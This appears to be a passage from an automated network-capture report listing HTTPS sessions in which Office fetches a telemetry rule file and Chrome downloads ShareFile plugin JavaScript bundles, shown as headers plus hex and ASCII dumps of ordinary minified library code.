                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:22 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                                x-ms-request-id: 3a76084c-201e-005d-4f66-1aafb3000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180522Z-185b7d577bdwr75vm8x5tbp6sg00000000f0000000004b3m
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                132192.168.2.64985713.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:22 UTC605OUTGET /sharefile-web/sharefiledev-storage-plugin-pilet/1.280.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 130723
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 03 Oct 2024 15:13:19 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                ETag: "0496a964f7644c653415d31fd499388b"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 29051585a13addd312c8ac9d527433c6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: gnipe1dBreJeYeUVL19NJtPrThXcDQ4p40A6Q9ZyGXxBVdjYyD-V2g==
                                                                                                                                                                                                                                                                                Age: 45981
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC15773INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 73 74 6f 72 61 67 65 70 6c 75 67 69 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevstoragepluginpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},u={};return Object.define
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 22 21 3d 74 79 70 65 6f 66 20 77 7c 7c 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 21 3d 3d 62 29 29 7b 69 66 28 21 74 2e 72 65 74 75 72 6e 4f 62 6a 65 63 74 73 26 26 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 4f 62 6a 65 63 74 73 29 7b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 7c 7c 74 68 69 73 2e 6c 6f 67 67 65 72 2e 77 61 72 6e 28 22 61 63 63 65 73 73 69 6e 67 20 61 6e 20 6f 62 6a 65 63 74 20 2d 20 62 75 74 20 72 65 74 75 72 6e 4f 62 6a 65 63 74 73 20 6f 70 74 69 6f 6e 73 20 69 73 20 6e 6f 74 20 65 6e 61 62 6c 65 64 21 22 29 3b 76 61 72 20 53 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 3f 74 68 69 73 2e 6f 70 74
                                                                                                                                                                                                                                                                                Data Ascii: "!=typeof w||"[object Array]"!==b)){if(!t.returnObjects&&!this.options.returnObjects){this.options.returnedObjectHandler||this.logger.warn("accessing an object - but returnObjects options is not enabled!");var S=this.options.returnedObjectHandler?this.opt
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 53 65 70 61 72 61 74 6f 72 3a 74 2e 66 6f 72 6d 61 74 53 65 70 61 72 61 74 6f 72 7c 7c 22 2c 22 2c 74 68 69 73 2e 75 6e 65 73 63 61 70 65 50 72 65 66 69 78 3d 74 2e 75 6e 65 73 63 61 70 65 53 75 66 66 69 78 3f 22 22 3a 74 2e 75 6e 65 73 63 61 70 65 50 72 65 66 69 78 7c 7c 22 2d 22 2c 74 68 69 73 2e 75 6e 65 73 63 61 70 65 53 75 66 66 69 78 3d 74 68 69 73 2e 75 6e 65 73 63 61 70 65 50 72 65 66 69 78 3f 22 22 3a 74 2e 75 6e 65 73 63 61 70 65 53 75 66 66 69 78 7c 7c 22 22 2c 74 68 69 73 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 3d 74 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 3f 43 28 74 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 29 3a 74 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 45 73 63 61 70 65 64 7c 7c 43 28 22 24 74 28 22 29 2c 74 68 69 73 2e 6e 65 73 74
                                                                                                                                                                                                                                                                                Data Ascii: Separator:t.formatSeparator||",",this.unescapePrefix=t.unescapeSuffix?"":t.unescapePrefix||"-",this.unescapeSuffix=this.unescapePrefix?"":t.unescapeSuffix||"",this.nestingPrefix=t.nestingPrefix?C(t.nestingPrefix):t.nestingPrefixEscaped||C("$t("),this.nest
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC15419INData Raw: 6d 70 61 74 69 62 69 6c 69 74 79 4a 53 4f 4e 2c 73 69 6d 70 6c 69 66 79 50 6c 75 72 61 6c 53 75 66 66 69 78 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 69 6d 70 6c 69 66 79 50 6c 75 72 61 6c 53 75 66 66 69 78 7d 29 2c 21 61 7c 7c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 21 3d 3d 72 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 7c 7c 28 75 2e 66 6f 72 6d 61 74 74 65 72 3d 6f 28 61 29 2c 75 2e 66 6f 72 6d 61 74 74 65 72 2e 69 6e 69 74 28 75 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61
                                                                                                                                                                                                                                                                                Data Ascii: mpatibilityJSON,simplifyPluralSuffix:this.options.simplifyPluralSuffix}),!a||this.options.interpolation.format&&this.options.interpolation.format!==r.interpolation.format||(u.formatter=o(a),u.formatter.init(u,this.options),this.options.interpolation.forma
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC419INData Raw: 2c 22 34 22 2c 22 35 22 2c 22 36 22 2c 22 37 22 2c 22 38 22 2c 22 39 22 2c 22 61 22 2c 22 62 22 2c 22 63 22 2c 22 64 22 2c 22 65 22 2c 22 66 22 5d 2c 74 5b 22 64 65 66 61 75 6c 74 22 5d 3d 6f 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 65 2e 65 78 70 6f 72 74 73 3d 6e 28 30 29 7d 5d 29 2c 45 65 2e 65 78 70 6f 72 74 73 29 2c 50 65 3d 28 6b 65 3d 6a 65 29 26 26 6b 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 26 26 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6b 65 2c 22 64 65 66 61 75 6c 74 22 29 3f 6b 65 5b 22 64 65 66 61 75 6c 74 22 5d 3a 6b 65 3b 66 75 6e 63 74 69 6f 6e 20 52 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5b 2d 5c 2f 5c 5c 5e 24 2e 2a 2b 3f 28 29 5b
                                                                                                                                                                                                                                                                                Data Ascii: ,"4","5","6","7","8","9","a","b","c","d","e","f"],t["default"]=o},function(e,t,n){e.exports=n(0)}]),Ee.exports),Pe=(ke=je)&&ke.__esModule&&Object.prototype.hasOwnProperty.call(ke,"default")?ke["default"]:ke;function Re(e){return e.replace(/[-\/\\^$.*+?()[
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 20 6f 70 74 69 6f 6e 73 22 29 3b 76 61 72 20 69 3d 52 65 28 72 29 2c 61 3d 52 65 28 6f 29 2c 73 3d 6e 3f 22 28 22 2e 63 6f 6e 63 61 74 28 69 2c 22 2e 2b 3f 22 29 2e 63 6f 6e 63 61 74 28 61 2c 22 29 22 29 3a 22 22 2e 63 6f 6e 63 61 74 28 69 2c 22 28 2e 2b 3f 29 22 29 2e 63 6f 6e 63 61 74 28 61 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 52 65 67 45 78 70 28 73 29 7d 66 75 6e 63 74 69 6f 6e 20 43 65 28 65 2c 74 29 7b 69 66 28 21 65 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 67 65 74 4b 65 79 46 6f 72 45 6c 65 6d 65 6e 74 28 29 20 6d 75 73 74 20 62 65 20 70 72 6f 76 69 64 65 64 20 65 6c 65 6d 65 6e 74 20 61 6e 64 20 74 6f 6b 65 6e 49 6e 64 65 78 22 29 3b 72 65 74 75 72 6e 20 50 65 2e 68 61 73 68 28 4a 53 4f 4e 2e 73
                                                                                                                                                                                                                                                                                Data Ascii: options");var i=Re(r),a=Re(o),s=n?"(".concat(i,".+?").concat(a,")"):"".concat(i,"(.+?)").concat(a);return new RegExp(s)}function Ce(e,t){if(!e||void 0===t)throw new Error("getKeyForElement() must be provided element and tokenIndex");return Pe.hash(JSON.s
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 6e 2e 6e 65 78 74 3d 72 2c 6f 26 26 28 6e 2e 6d 65 74 68 6f 64 3d 22 6e 65 78 74 22 2c 6e 2e 61 72 67 3d 74 29 2c 21 21 6f 7d 66 6f 72 28 76 61 72 20 6f 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 2e 6c 65 6e 67 74 68 2d 31 3b 6f 3e 3d 30 3b 2d 2d 6f 29 7b 76 61 72 20 69 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 5b 6f 5d 2c 73 3d 69 2e 63 6f 6d 70 6c 65 74 69 6f 6e 3b 69 66 28 22 72 6f 6f 74 22 3d 3d 3d 69 2e 74 72 79 4c 6f 63 29 72 65 74 75 72 6e 20 72 28 22 65 6e 64 22 29 3b 69 66 28 69 2e 74 72 79 4c 6f 63 3c 3d 74 68 69 73 2e 70 72 65 76 29 7b 76 61 72 20 75 3d 61 2e 63 61 6c 6c 28 69 2c 22 63 61 74 63 68 4c 6f 63 22 29 2c 63 3d 61 2e 63 61 6c 6c 28 69 2c 22 66 69 6e 61 6c 6c 79 4c 6f 63 22 29 3b 69 66 28 75 26 26 63 29 7b 69 66 28 74 68 69
                                                                                                                                                                                                                                                                                Data Ascii: n.next=r,o&&(n.method="next",n.arg=t),!!o}for(var o=this.tryEntries.length-1;o>=0;--o){var i=this.tryEntries[o],s=i.completion;if("root"===i.tryLoc)return r("end");if(i.tryLoc<=this.prev){var u=a.call(i,"catchLoc"),c=a.call(i,"finallyLoc");if(u&&c){if(thi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 5b 22 29 2e 72 65 70 6c 61 63 65 28 2f 25 35 44 2f 67 69 2c 22 5d 22 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 2c 74 2c 6e 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 65 3b 63 6f 6e 73 74 20 72 3d 6e 26 26 6e 2e 65 6e 63 6f 64 65 7c 7c 63 65 2c 6f 3d 6e 26 26 6e 2e 73 65 72 69 61 6c 69 7a 65 3b 6c 65 74 20 69 3b 69 66 28 69 3d 6f 3f 6f 28 74 2c 6e 29 3a 24 2e 69 73 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 74 29 3f 74 2e 74 6f 53 74 72 69 6e 67 28 29 3a 6e 65 77 20 75 65 28 74 2c 6e 29 2e 74 6f 53 74 72 69 6e 67 28 72 29 2c 69 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 69 6e 64 65 78 4f 66 28 22 23 22 29 3b 2d 31 21 3d 3d 74 26 26 28 65 3d 65 2e 73 6c 69 63 65 28 30 2c 74 29 29 2c 65 2b 3d 28 2d 31 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 3f
                                                                                                                                                                                                                                                                                Data Ascii: [").replace(/%5D/gi,"]")}function le(e,t,n){if(!t)return e;const r=n&&n.encode||ce,o=n&&n.serialize;let i;if(i=o?o(t,n):$.isURLSearchParams(t)?t.toString():new ue(t,n).toString(r),i){const t=e.indexOf("#");-1!==t&&(e=e.slice(0,t)),e+=(-1===e.indexOf("?")?
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC14808INData Raw: 79 42 75 66 66 65 72 28 29 29 2e 62 79 74 65 4c 65 6e 67 74 68 3a 24 2e 69 73 41 72 72 61 79 42 75 66 66 65 72 56 69 65 77 28 65 29 7c 7c 24 2e 69 73 41 72 72 61 79 42 75 66 66 65 72 28 65 29 3f 65 2e 62 79 74 65 4c 65 6e 67 74 68 3a 28 24 2e 69 73 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 65 29 26 26 28 65 2b 3d 22 22 29 2c 24 2e 69 73 53 74 72 69 6e 67 28 65 29 3f 28 61 77 61 69 74 20 58 65 28 65 29 29 2e 62 79 74 65 4c 65 6e 67 74 68 3a 76 6f 69 64 20 30 29 29 28 74 29 3a 6e 7d 2c 61 74 3d 7b 68 74 74 70 3a 6e 75 6c 6c 2c 78 68 72 3a 4b 65 2c 66 65 74 63 68 3a 47 65 26 26 28 61 73 79 6e 63 20 65 3d 3e 7b 6c 65 74 7b 75 72 6c 3a 74 2c 6d 65 74 68 6f 64 3a 6e 2c 64 61 74 61 3a 72 2c 73 69 67 6e 61 6c 3a 6f 2c 63 61 6e 63 65 6c 54 6f 6b 65 6e 3a 69
                                                                                                                                                                                                                                                                                Data Ascii: yBuffer()).byteLength:$.isArrayBufferView(e)||$.isArrayBuffer(e)?e.byteLength:($.isURLSearchParams(e)&&(e+=""),$.isString(e)?(await Xe(e)).byteLength:void 0))(t):n},at={http:null,xhr:Ke,fetch:Ge&&(async e=>{let{url:t,method:n,data:r,signal:o,cancelToken:i
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC2384INData Raw: 36 36 35 29 2c 68 2e 65 28 36 37 35 29 2c 68 2e 65 28 31 34 29 5d 29 2e 74 68 65 6e 28 68 2e 62 69 6e 64 28 68 2c 37 37 30 31 34 29 29 7d 29 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 5b 22 64 65 66 61 75 6c 74 22 5d 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 65 5b 22 64 65 66 61 75 6c 74 22 5d 2e 53 75 73 70 65 6e 73 65 2c 7b 66 61 6c 6c 62 61 63 6b 3a 65 5b 22 64 65 66 61 75 6c 74 22 5d 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 74 2e 53 70 69 6e 2c 6e 75 6c 6c 29 7d 2c 65 5b 22 64 65 66 61 75 6c 74 22 5d 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 61 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 6e 29 29 29 7d 2c 75 3d 65 5b 22 64 65 66 61 75 6c 74 22 5d 2e 6c 61 7a 79 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72
                                                                                                                                                                                                                                                                                Data Ascii: 665),h.e(675),h.e(14)]).then(h.bind(h,77014))})),s=function(n){return e["default"].createElement(e["default"].Suspense,{fallback:e["default"].createElement(t.Spin,null)},e["default"].createElement(a,Object.assign({},n)))},u=e["default"].lazy((function(){r


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                133192.168.2.64985813.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:22 UTC419OUTGET /sharefile-web/sharefiledev-rubicon-pilet/0.33.3/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 166904
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 23 Sep 2024 13:44:13 GMT
                                                                                                                                                                                                                                                                                ETag: "6ece8cf8647f68f66c594ff97fe16702"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 24c299c0a6423c6f96984a85fb014108.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: ymibKQ3SGIf141Q4Dl5-0wI5EGR2NniGITI2uW4v8ZvEcG2BSfVQWw==
                                                                                                                                                                                                                                                                                Age: 45981
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC2947INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 75 62 69 63 6f 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 73 3d 7b 7d 2c 61 3d 7b 7d 2c 75 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevrubiconpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},s={},a={},u={},c={};return
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 7d 7d 65 6c 73 65 20 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 65 29 29 3b 74 68 69 73 2e 63 74 72 2b 2b 7d 2c 74 2e 66 6c 75 73 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 74 61 67 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 7d 29 29 2c 74 68 69 73 2e 74 61 67 73 3d 5b 5d 2c 74 68 69 73 2e 63 74 72 3d 30 7d 2c 65 7d 28 29 2c 69 3d 4d 61 74 68 2e 61 62 73 2c 6f 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 73 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29
                                                                                                                                                                                                                                                                                Data Ascii: }}else t.appendChild(document.createTextNode(e));this.ctr++},t.flush=function(){this.tags.forEach((function(e){return e.parentNode&&e.parentNode.removeChild(e)})),this.tags=[],this.ctr=0},e}(),i=Math.abs,o=String.fromCharCode,s=Object.assign;function a(e)
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 28 65 5b 6e 5d 21 3d 3d 74 5b 6e 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 65 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 26 26 65 2e 6c 65 6e 67 74 68 3d 3d 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 6c 65 6e 67 74 68 7d 66 75 6e 63 74 69 6f 6e 20 43 28 65 29 7b 69 66 28 21 45 28 65 29 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 74 3d 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 29 72 65 74 75 72 6e 21 30 3b 63 6f 6e 73 74 20 6e 3d 74 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 21 21 45 28 6e 29 26 26 21 21 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 22 29 7d 66 75 6e 63 74
                                                                                                                                                                                                                                                                                Data Ascii: (e[n]!==t[n])return!1;return!0}function O(e){return Array.isArray(e)&&e.length===Object.keys(e).length}function C(e){if(!E(e))return!1;const t=e.constructor;if(void 0===t)return!0;const n=t.prototype;return!!E(n)&&!!n.hasOwnProperty("isPrototypeOf")}funct
